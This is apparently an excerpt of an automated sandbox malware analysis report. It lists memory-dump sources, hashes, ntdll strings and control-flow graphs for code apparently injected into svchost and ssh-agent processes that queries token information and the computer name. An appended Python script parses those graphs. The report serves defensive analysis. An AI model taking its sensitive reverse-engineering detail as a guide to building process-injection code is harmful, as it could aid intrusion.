                                        • Instruction ID: decfa182cbeb0519ed6a9cac113e0d3b81e508070b1074b323c03d067af35d85
                                        • Opcode Fuzzy Hash: 0f08132bcb134343e2536a16f9449f81fb528c8d8431e6dfb50d774c24539a0c
                                        • Instruction Fuzzy Hash: 3290023130140C42D100B2585444B860046D7E0311F99C016A4125659D8715C9517521
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f60889ccc54b80a376c6cfa6bc0b4e880bc44ceda492098b3ab33bfa63036e6
                                        • Instruction ID: 6f0d43d299022d9232c0639f38956eec38078f7c25f7d61fb370a491fa29048d
                                        • Opcode Fuzzy Hash: 5f60889ccc54b80a376c6cfa6bc0b4e880bc44ceda492098b3ab33bfa63036e6
                                        • Instruction Fuzzy Hash: 4C90022170540802D140B25864587460056D7D0311F99D011A4025559DC7598B5566A1
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e4f7342535343e9013b11766d526a8ed8ff16847892a66a9ccddad7e5efd5a6d
                                        • Instruction ID: c63b80de5b6123f48625cd16428ab6be014ed89060c02ba6d3b5350c4414ecfd
                                        • Opcode Fuzzy Hash: e4f7342535343e9013b11766d526a8ed8ff16847892a66a9ccddad7e5efd5a6d
                                        • Instruction Fuzzy Hash: D490023130140803D100B25865487470046D7D0311F99D411A442555DDD75689516121
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 30639fd39c5e244f01f4df69e3b066ad90b7ab90f98a9e99a2a2d9c97e121878
                                        • Instruction ID: 95231c4e9910b48c213e678abe9171d474fcb96a18e340b89a50064e04fcba6b
                                        • Opcode Fuzzy Hash: 30639fd39c5e244f01f4df69e3b066ad90b7ab90f98a9e99a2a2d9c97e121878
                                        • Instruction Fuzzy Hash: 0A90023130140802D100B69864486860046D7E0311F99D011A902555AEC76589916131
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                        • Instruction ID: cad0a385ede9b23490afbfd93d057d52bbb0fb07c7f233bc4f34809267bfc98b
                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                        • Instruction Fuzzy Hash:
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID: ___swprintf_l
                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                        • API String ID: 48624451-2108815105
                                        • Opcode ID: 28bc2a890088e73857be3e41f9d1a0cbe9ac56bba41fcf2287fcd78369d76d47
                                        • Instruction ID: 512c748b916199f3e699dd92a45fd2eaa41628d98beaeeed50ba4035a54a9085
                                        • Opcode Fuzzy Hash: 28bc2a890088e73857be3e41f9d1a0cbe9ac56bba41fcf2287fcd78369d76d47
                                        • Instruction Fuzzy Hash: E451E9B5A04616BFCF10DB9CF89097EF7B8BB48200B588969E4A5D7651D334DE40CBA0
                                        Strings
                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 035A4725
                                        • ExecuteOptions, xrefs: 035A46A0
                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 035A4787
                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 035A4742
                                        • Execute=1, xrefs: 035A4713
                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 035A4655
                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 035A46FC
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                        • API String ID: 0-484625025
                                        • Opcode ID: e3bfaf553d4e3ce472fea08bb031be22e5fbbcd44d4297938f1525695b14371b
                                        • Instruction ID: b194caa1306dc0a56fbc8f4ce96d9a340e1ff2e38a31058a228338e9bb0a2d7b
                                        • Opcode Fuzzy Hash: e3bfaf553d4e3ce472fea08bb031be22e5fbbcd44d4297938f1525695b14371b
                                        • Instruction Fuzzy Hash: 3D510B756007197AEF20EAA9FC45FAE77B8FF48308F0404E9D505AB2B1D7709A458F90
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID: __aulldvrm
                                        • String ID: +$-$0$0
                                        • API String ID: 1302938615-699404926
                                        • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                        • Instruction ID: d135196b6777541c468e469ca19b6bf304c7443fc87467950b63b72111212860
                                        • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                        • Instruction Fuzzy Hash: 8181A074E052499EDF24CE68F8917FEBBB6BF45350F1C465AD861AB3B0C73499408B90
                                        Strings
                                        • RTL: Re-Waiting, xrefs: 035A031E
                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 035A02BD
                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 035A02E7
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                        • API String ID: 0-2474120054
                                        • Opcode ID: b0890b55a09e2c356123280ed92e4ca247d1c7635efe9bc57475c95ce100cd51
                                        • Instruction ID: 996607c9cf1c8a8b0cc1f366992d9890f20b06b7fcc29fc1ad8f5f6498e55843
                                        • Opcode Fuzzy Hash: b0890b55a09e2c356123280ed92e4ca247d1c7635efe9bc57475c95ce100cd51
                                        • Instruction Fuzzy Hash: D3E1AD30614B41DFD724CF28E894B2AB7E4BF84314F184A5AF9A58B2F1D774E945CB82
                                        Strings
                                        • RTL: Re-Waiting, xrefs: 035A7BAC
                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 035A7B7F
                                        • RTL: Resource at %p, xrefs: 035A7B8E
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                        • API String ID: 0-871070163
                                        • Opcode ID: 484851e7f91c7dc8d224f22419ed96e60e4cfd72355c38c448f354eb5474ffaf
                                        • Instruction ID: 4ffa901796abf4111ed1101830993b978eb88aa0bd9ea1ffcac85e63781c905d
                                        • Opcode Fuzzy Hash: 484851e7f91c7dc8d224f22419ed96e60e4cfd72355c38c448f354eb5474ffaf
                                        • Instruction Fuzzy Hash: 1541E4353007069FD724DE69EC40B6AF7E9FF88710F140A2DE956DB6A0EB71E8058B91
                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 035A728C
                                        Strings
                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 035A7294
                                        • RTL: Re-Waiting, xrefs: 035A72C1
                                        • RTL: Resource at %p, xrefs: 035A72A3
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                        • API String ID: 885266447-605551621
                                        • Opcode ID: 58e660390372ed924119729d12f7ebfdf04610fd6f76ec56548777584b97e25c
                                        • Instruction ID: a2f5a284ef6d26892f8723677aa72b0eba7da80b07989e7cce11ab120af9eb2c
                                        • Opcode Fuzzy Hash: 58e660390372ed924119729d12f7ebfdf04610fd6f76ec56548777584b97e25c
                                        • Instruction Fuzzy Hash: 7941E135600606ABD720DE69EC41F6AB7B6FF88710F140A29F955EB260DB21E812D7D1
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID: __aulldvrm
                                        • String ID: +$-
                                        • API String ID: 1302938615-2137968064
                                        • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                        • Instruction ID: 98c82993e58af2e1058433f82f046f19b095697febd68c773b386de1f2d76932
                                        • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                        • Instruction Fuzzy Hash: DE91A170E002169FDF24DE69F981ABEB7B5FF88320F58455AEC65E72E0E73099418B50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_3500000_svchost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $$@
                                        • API String ID: 0-1194432280
                                        • Opcode ID: 45f012babebe3db10ec301d992a0fc5be2643d0ee2d53b0f300d97a3ced99c71
                                        • Instruction ID: 0507b68d76dd675cc5941cafbec1a74bdf2af06b0945adc460446c8e8153e10f
                                        • Opcode Fuzzy Hash: 45f012babebe3db10ec301d992a0fc5be2643d0ee2d53b0f300d97a3ced99c71
                                        • Instruction Fuzzy Hash: CD8139B6D002699BDB35DF54DC44BEAB7B8BB48710F0445EAA909B7290D7709E80CFA0

                                        Execution Graph

                                        Execution Coverage:3.9%
                                        Dynamic/Decrypted Code Coverage:97.4%
                                        Signature Coverage:0%
                                        Total number of Nodes:77
                                        Total number of Limit Nodes:6

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        APIs
                                        • GetSystemDefaultLangID.KERNELBASE ref: 00D253C4
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.2956088578.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_d20000_ssh-agent.jbxd
                                        Similarity
                                        • API ID: DefaultLangSystem
                                        • String ID:
                                        • API String ID: 706401283-0
                                        • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                        • Instruction ID: fceda80f30eac26b33ac54387c4505d91f0ee0f1ddc90312ac0a38c556ee7199
                                        • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                        • Instruction Fuzzy Hash: D041D67140DEB58FD72692247464EB07BD0AB323EEF5D15D6D4C2860EED1B89C82933A

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.2956088578.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_d20000_ssh-agent.jbxd
                                        Similarity
                                        • API ID: ComputerName
                                        • String ID:
                                        • API String ID: 3545744682-0
                                        • Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                        • Instruction ID: 622fd97cf28733f149b5f87a2e1fcaf5669d4925da9c9bb40f70e017797dff8e
                                        • Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                        • Instruction Fuzzy Hash: C0D12731518F098BC728EF58D8457EABBE1FBA0310F18461FDA86C7164DA74DA458BD2

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.2956088578.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_d20000_ssh-agent.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                        • Instruction ID: 288f98f44e10b1ea52facbc149525655efd9c97d1b8a38342a663c8192100ce0
                                        • Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                        • Instruction Fuzzy Hash: 0E61FF3050FB75DFD76A8B28B8142356AA0FB75358F6C025AE486C31E0CE249C59B376

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.2956088578.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_d20000_ssh-agent.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                        • Instruction ID: a613de5ca0ed84d3b17995f8cfa5bdebf62695cb2f036c7edfb8275d592f45ed
                                        • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                        • Instruction Fuzzy Hash: 22F17A2071CE588FC669A72C78517BAB7D1EB99314F5C419EE08AC329ACD34DC4687B2

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.2956088578.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_d20000_ssh-agent.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                        • Instruction ID: 68dbe82540a080d2343ba15e938d8aa89ee6c947a01b9c8d4575f7319fa090c1
                                        • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                        • Instruction Fuzzy Hash: 7021913020CF658FCB699B18B458F7467A1EBB531DF5C02A69487CE19EEA34CC44A735

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.2956088578.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_d20000_ssh-agent.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                        • Instruction ID: f12e37f06289d2b6cbaefb9f27bade6f7f641c61a25645262781a9b58509ffd6
                                        • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                        • Instruction Fuzzy Hash: E401803010DF668FDB555624BC19F7967A0AB7032CF2902AB84C7CA09DEAB58900B772

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.2956088578.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_d20000_ssh-agent.jbxd
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                        • Instruction ID: 2980f34a10accb7ba40a6e1b218b224194288969276f6a3140c6a966fc69707a
                                        • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                        • Instruction Fuzzy Hash: CAE0863060DB544FDB599F2478117193AE5EBA8318F1901CFC48ADB1D9DB79490547A2

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.2956088578.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_d20000_ssh-agent.jbxd
                                        Similarity
                                        • API ID: wcscpy
                                        • String ID:
                                        • API String ID: 1284135714-0
                                        • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                        • Instruction ID: d50485cc0ef8101089b389b03b442d5003e906eb3e8e0509177a6a061e574247
                                        • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                        • Instruction Fuzzy Hash: 5501F76050EE70CFD61AA7187002E796551F7B633CF2C4156908AC709EC9349D849F71

                                        Control-flow Graph

                                        control_flow_graph 501 d28090-d28096 502 d28184 501->502 503 d28186 CloseHandle 502->503 504 d2818c-d28192 502->504 503->504 505 d28194 504->505 506 d28115-d28118 504->506 505->506 509 d2819a 505->509 507 d280a7 506->507 508 d28119-d2811a 506->508 508->507 511 d2811c 508->511 510 d2813c 509->510 510->502 512 d2820f 511->512 513 d28215-d2821e 512->513 514 d2808e-d28096 512->514 513->514 516 d28224 513->516 517 d28226 516->517 518 d281d7-d281e6 call d5715c 516->518 517->518 519 d28228-d282ee call d25d90 517->519 528 d280ca-d2810f GetTokenInformation 518->528 529 d28089 518->529 530 d282f0 519->530 531 d2830c-d2831e 519->531 534 d28111 528->534 535 d2812d 528->535 529->528 533 d2808b 529->533 530->531 536 d282f2 530->536 537 d28320 531->537 538 d282a1-d282ba call d25d90 call d2ec00 531->538 539 d2808c 533->539 534->535 542 d28113 534->542 543 d28133 535->543 544 d280a8 535->544 541 d282f7-d282fc call d25d90 536->541 540 d28322 537->540 537->541 538->537 539->514 540->541 546 d28324-d28326 540->546 562 d28302 541->562 563 d28253-d28265 call d41280 541->563 542->506 543->510 549 d281ed-d281f0 543->549 547 d280aa-d280ad 544->547 551 d28328 546->551 552 d28163-d28170 call d57164 547->552 553 d280b3-d28203 547->553 554 d281f6 549->554 555 d280da-d280f1 549->555 565 d28335 551->565 566 d282df-d2832b 551->566 552->503 574 d28172 552->574 553->552 571 d28209 553->571 554->555 561 d281fc 554->561 555->547 569 d281fe-d28201 GetTokenInformation 561->569 562->563 570 d28308-d2830a 562->570 563->551 579 d2826b 563->579 577 d2826e-d28285 565->577 566->565 578 d2832d-d28331 566->578 569->512 586 d281b7 569->586 570->531 574->504 581 d28287 577->581 582 d2829b-d2829d 577->582 578->565 579->577 584 d28239 579->584 585 d2824c 581->585 582->538 584->551 587 d2823f-d28243 584->587 585->582 588 d2824e-d28252 585->588 586->512 589 d281b9-d281ca 586->589 587->541 587->585 588->577 592 d280f3 589->592 593 d281d0 589->593 592->539 594 d280f5 592->594 593->569 598 d280c3 593->598 594->539 599 d28077 594->599 598->569 600 d280c9 598->600 599->518 600->528
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.2956088578.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_d20000_ssh-agent.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                        • Instruction ID: c82aa0dfa8307d9d6bf1236bceec69c75d403b6ced8729b64ffe1db0ff20360c
                                        • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                        • Instruction Fuzzy Hash: D9C08C6012FF3296B23B03487C0B0B02650823275EB0C00068C42C02E0DD04CE7330B7

                                        Control-flow Graph

                                        control_flow_graph 601 d2817f 602 d28184 601->602 603 d28186 CloseHandle 602->603 604 d2818c-d28192 602->604 603->604 605 d28194 604->605 606 d28115-d28118 604->606 605->606 609 d2819a 605->609 607 d280a7 606->607 608 d28119-d2811a 606->608 608->607 611 d2811c 608->611 610 d2813c 609->610 610->602 612 d2820f 611->612 613 d28215-d2821e 612->613 614 d2808e-d28096 612->614 613->614 616 d28224 613->616 617 d28226 616->617 618 d281d7-d281e6 call d5715c 616->618 617->618 619 d28228-d282ee call d25d90 617->619 628 d280ca-d2810f GetTokenInformation 618->628 629 d28089 618->629 630 d282f0 619->630 631 d2830c-d2831e 619->631 634 d28111 628->634 635 d2812d 628->635 629->628 633 d2808b 629->633 630->631 636 d282f2 630->636 637 d28320 631->637 638 d282a1-d282ba call d25d90 call d2ec00 631->638 639 d2808c 633->639 634->635 642 d28113 634->642 643 d28133 635->643 644 d280a8 635->644 641 d282f7-d282fc call d25d90 636->641 640 d28322 637->640 637->641 638->637 639->614 640->641 646 d28324-d28326 640->646 662 d28302 641->662 663 d28253-d28265 call d41280 641->663 642->606 643->610 649 d281ed-d281f0 643->649 647 d280aa-d280ad 644->647 651 d28328 646->651 652 d28163-d28170 call d57164 647->652 653 d280b3-d28203 647->653 654 d281f6 649->654 655 d280da-d280f1 649->655 665 d28335 651->665 666 d282df-d2832b 651->666 652->603 674 d28172 652->674 653->652 671 d28209 653->671 654->655 661 d281fc 654->661 655->647 669 d281fe-d28201 GetTokenInformation 661->669 662->663 670 d28308-d2830a 662->670 663->651 679 d2826b 663->679 677 d2826e-d28285 665->677 666->665 678 d2832d-d28331 666->678 669->612 686 d281b7 669->686 670->631 674->604 681 d28287 677->681 682 d2829b-d2829d 677->682 678->665 679->677 684 d28239 679->684 685 d2824c 681->685 682->638 684->651 687 d2823f-d28243 684->687 685->682 688 d2824e-d28252 685->688 686->612 689 d281b9-d281ca 686->689 687->641 687->685 688->677 692 d280f3 689->692 693 d281d0 689->693 692->639 694 d280f5 692->694 693->669 698 d280c3 693->698 694->639 699 d28077 694->699 698->669 700 d280c9 698->700 699->618 700->628
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.2956088578.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_d20000_ssh-agent.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                        • Instruction ID: a0144144e3b167a8b56b91501796dbed983e4b716bb8f6c48b22e398278a41dc
                                        • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                        • Instruction Fuzzy Hash: 1AC092A055BB3987B13B2788BC0A0B135A04673B6AF0C4512ED06CA3F0DD588DB371B2
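The control_flow_graph dumps above are a flat token list (block id, address range, optional internal call targets or imported API names, and src->dst edges), which is awkward to read by eye when the question is "which blocks of the injected code at 0xD28090 reach GetTokenInformation, and along which path?". The script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses that token format into blocks and edges and answers that question with a breadth-first search from the function entry. The token grammar is inferred from the dumps on this page and is an assumption, not a documented format; the sample input is an excerpt of the d28090 dump above (block ids and addresses copied from the page, cut off after block 529), and the function names parse_cfg, api_blocks and path_to_api are the example's own.

```python
"""Parse a Joe Sandbox control_flow_graph text dump and locate API calls.

Added example, not part of the Joe Sandbox report or its IDA plugin.
The token grammar below is inferred from the dumps visible on this page
(an assumption, not a documented Joe Sandbox format):

    control_flow_graph
    <id> <start>[-<end>] [call <addr> ...] [<ApiName> ...]   (basic block)
    <src>-><dst>                                           (edge)
"""
import re
from collections import defaultdict, deque

# Excerpt of the dump for the function at d28090 shown above (block ids and
# addresses copied from this page; the excerpt stops after block 529).
SAMPLE_CFG = """
control_flow_graph 501 d28090-d28096 502 d28184 501->502 503 d28186 CloseHandle
502->503 504 d2818c-d28192 502->504 503->504 505 d28194 504->505 506 d28115-d28118
504->506 505->506 509 d2819a 505->509 507 d280a7 506->507 508 d28119-d2811a
506->508 508->507 511 d2811c 508->511 510 d2813c 509->510 510->502 512 d2820f
511->512 513 d28215-d2821e 512->513 514 d2808e-d28096 512->514 513->514
516 d28224 513->516 517 d28226 516->517 518 d281d7-d281e6 call d5715c 516->518
517->518 519 d28228-d282ee call d25d90 517->519
528 d280ca-d2810f GetTokenInformation 518->528 529 d28089 518->529
"""

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ID_RE = re.compile(r"^\d+$")
# Addresses in these dumps are lower-case hex that always contain a letter,
# so a pure-decimal token is never taken for an address (assumption).
ADDR_RE = re.compile(r"^[0-9a-f]+(-[0-9a-f]+)?$")


def parse_cfg(text):
    """Return ({block_id: {"addr", "calls", "apis"}}, [(src, dst), ...])."""
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, cur, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif tok == "call" and cur is not None and i + 1 < len(tokens):
            blocks[cur]["calls"].append(tokens[i + 1])  # internal callee address
            i += 2
        elif (ID_RE.match(tok) and i + 1 < len(tokens)
              and ADDR_RE.match(tokens[i + 1]) and not ID_RE.match(tokens[i + 1])):
            cur = int(tok)  # new basic block: "<id> <addr-range>"
            blocks[cur] = {"addr": tokens[i + 1], "calls": [], "apis": []}
            i += 2
        else:
            if cur is not None:
                blocks[cur]["apis"].append(tok)  # imported API name in this block
            i += 1
    return blocks, edges


def successors(edges):
    succ = defaultdict(list)
    for s, d in edges:
        succ[s].append(d)
    return succ


def api_blocks(blocks):
    """Blocks that call an imported API directly, as id -> [names]."""
    return {bid: b["apis"] for bid, b in blocks.items() if b["apis"]}


def path_to_api(blocks, edges, entry, api):
    """Shortest path (by edge count) from entry to a block that calls api, or None."""
    succ = successors(edges)
    parent = {entry: None}
    queue = deque([entry])
    while queue:
        n = queue.popleft()
        if api in blocks.get(n, {}).get("apis", []):
            path = []
            while n is not None:
                path.append(n)
                n = parent[n]
            return path[::-1]
        for d in succ[n]:
            if d not in parent:
                parent[d] = n
                queue.append(d)
    return None


def path_addresses(blocks, path):
    """Translate a block-id path into the address ranges shown in the dump."""
    return [blocks[b]["addr"] for b in path]


if __name__ == "__main__":
    blocks, edges = parse_cfg(SAMPLE_CFG)
    print(len(blocks), "blocks,", len(edges), "edges")
    print("API blocks:", api_blocks(blocks))
    p = path_to_api(blocks, edges, 501, "GetTokenInformation")
    print(" -> ".join(path_addresses(blocks, p)))
```

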